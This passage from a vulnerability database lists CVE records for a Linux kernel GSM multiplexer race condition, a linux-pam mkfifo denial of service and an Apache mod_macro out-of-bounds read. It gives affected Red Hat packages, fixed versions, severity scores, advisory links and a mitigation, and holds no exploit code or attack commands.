"x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1614" }, { "name": "RHSA-2024:2093", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2093" }, { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2621", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2621" }, { "name": "RHSA-2024:2697", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2697" }, { "name": "RHSA-2024:4577", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4577" }, { "name": "RHSA-2024:4729", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4729" }, { "name": "RHSA-2024:4731", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4731" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6546" }, { "name": "RHBZ#2255498", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255498" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/3c4f8333b582487a2d1e02171f1465531cde53e3" }, { "tags": [ "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20527" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.24.1.rt7.326.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.24.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Advanced Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.136.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.134.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::nfv", "cpe:/a:redhat:rhel_tus:8.4::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.134.1.rt7.210.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.134.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.134.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.93.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.55.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.0::baseos", "cpe:/a:redhat:rhel_eus:9.0::appstream", "cpe:/a:redhat:rhel_eus:9.0::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.93.2.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::nfv", "cpe:/a:redhat:rhel_eus:9.0::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.93.1.rt21.165.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.0::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.55.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::nfv", "cpe:/a:redhat:rhel_eus:9.2::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.55.1.rt14.340.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.93.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-operator-bundle", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-16", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-rhel8-operator", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-7", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch6-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-408", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-operator-bundle", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-19", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-proxy-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.0.0-480", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-rhel8-operator", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-9", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/eventrouter-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.4.0-248", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/fluentd-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.14.6-215", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/kibana6-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-431", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/log-file-metric-exporter-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.1.0-228", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-curator5-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.1-471", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-loki-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v2.9.6-15", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-view-plugin-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-3", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-operator-bundle", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-27", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-rhel8-operator", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-12", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/lokistack-gateway-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-527", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/opa-openshift-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-225", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/vector-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.28.1-57", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-12-21T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Important" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T15:13:50.794Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:0930", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0930" }, { "name": "RHSA-2024:0937", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0937" }, { "name": "RHSA-2024:1018", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1018" }, { "name": "RHSA-2024:1019", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1019" }, { "name": "RHSA-2024:1055", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1055" }, { "name": "RHSA-2024:1250", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1250" }, { "name": "RHSA-2024:1253", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1253" }, { "name": "RHSA-2024:1306", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1306" }, { "name": "RHSA-2024:1607", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1607" }, { "name": "RHSA-2024:1612", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1612" }, { "name": "RHSA-2024:1614", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1614" }, { "name": "RHSA-2024:2093", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2093" }, { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2621", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2621" }, { "name": "RHSA-2024:2697", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2697" }, { "name": "RHSA-2024:4577", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4577" }, { "name": "RHSA-2024:4729", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4729" }, { "name": "RHSA-2024:4731", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4731" }, { "name": "RHSA-2024:4970", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4970" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6546" }, { "name": "RHBZ#2255498", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255498" }, { "url": "https://github.com/torvalds/linux/commit/3c4f8333b582487a2d1e02171f1465531cde53e3" }, { "url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20527" } ], "timeline": [ { "lang": "en", "time": "2023-12-18T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-12-21T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: gsm multiplexing race condition leads to privilege escalation", "workarounds": [ { "lang": "en", "value": "This flaw can be mitigated by preventing the affected `n_gsm` kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278." } ], "x_redhatCweChain": "CWE-362-\u003eCWE-416: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027) leads to Use After Free" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6546", "datePublished": "2023-12-21T20:01:03.217Z", "dateReserved": "2023-12-06T07:11:48.937Z", "dateUpdated": "2024-11-15T15:13:50.794Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-22365
Vulnerability from cvelistv5
Published
2024-02-06 00:00
Modified
2024-08-01 22:43
Severity ?
EPSS score ?
Summary
linux-pam (aka Linux PAM) before 1.6.0 allows attackers to cause a denial of service (blocked login process) via mkfifo because the openat call (for protect_dir) lacks O_DIRECTORY.
References
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-22365", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-15T21:07:13.510998Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:52:23.208Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T22:43:34.704Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/linux-pam/linux-pam" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/01/18/3" }, { "tags": [ "x_transferred" ], "url": "https://github.com/linux-pam/linux-pam/releases/tag/v1.6.0" }, { "tags": [ "x_transferred" ], "url": "https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "linux-pam (aka Linux PAM) before 1.6.0 allows attackers to cause a denial of service (blocked login process) via mkfifo because the openat call (for protect_dir) lacks O_DIRECTORY." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-02-06T07:26:23.317057", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/linux-pam/linux-pam" }, { "url": "http://www.openwall.com/lists/oss-security/2024/01/18/3" }, { "url": "https://github.com/linux-pam/linux-pam/releases/tag/v1.6.0" }, { "url": "https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2024-22365", "datePublished": "2024-02-06T00:00:00", "dateReserved": "2024-01-09T00:00:00", "dateUpdated": "2024-08-01T22:43:34.704Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-31122
Vulnerability from cvelistv5
Published
2023-10-23 06:51
Modified
2024-09-17 13:47
Severity ?
EPSS score ?
Summary
Out-of-bounds Read vulnerability in mod_macro of Apache HTTP Server.This issue affects Apache HTTP Server: through 2.4.57.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Apache Software Foundation | Apache HTTP Server |
Version: 0 ≤ 2.4.57 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T14:45:25.498Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://httpd.apache.org/security/vulnerabilities_24.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TI3V2YCEUM65QDYPGGNUZ7UONIM5OEXC/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231027-0011/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VZJTT5TEFNSBWVMKCLS6EZ7PI6EJYBCO/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFDNHDH4VLFGDPY6MEZV2RO5N5FLFONW/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00013.html" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-31122", "options": [ { "Exploitation": "none" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-09-11T20:23:50.224711Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-09-17T13:47:23.424Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Apache HTTP Server", "vendor": "Apache Software Foundation", "versions": [ { "lessThanOrEqual": "2.4.57", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "finder", "value": "David Shoon (github/davidshoon)" } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Out-of-bounds Read vulnerability in mod_macro of Apache HTTP Server.\u003cp\u003eThis issue affects Apache HTTP Server: through 2.4.57.\u003c/p\u003e" } ], "value": "Out-of-bounds Read vulnerability in mod_macro of Apache HTTP Server.This issue affects Apache HTTP Server: through 2.4.57.\n\n" } ], "metrics": [ { "other": { "content": { "text": "low" }, "type": "Textual description of severity" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "CWE-125 Out-of-bounds Read", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-10-23T06:51:59.705Z", "orgId": 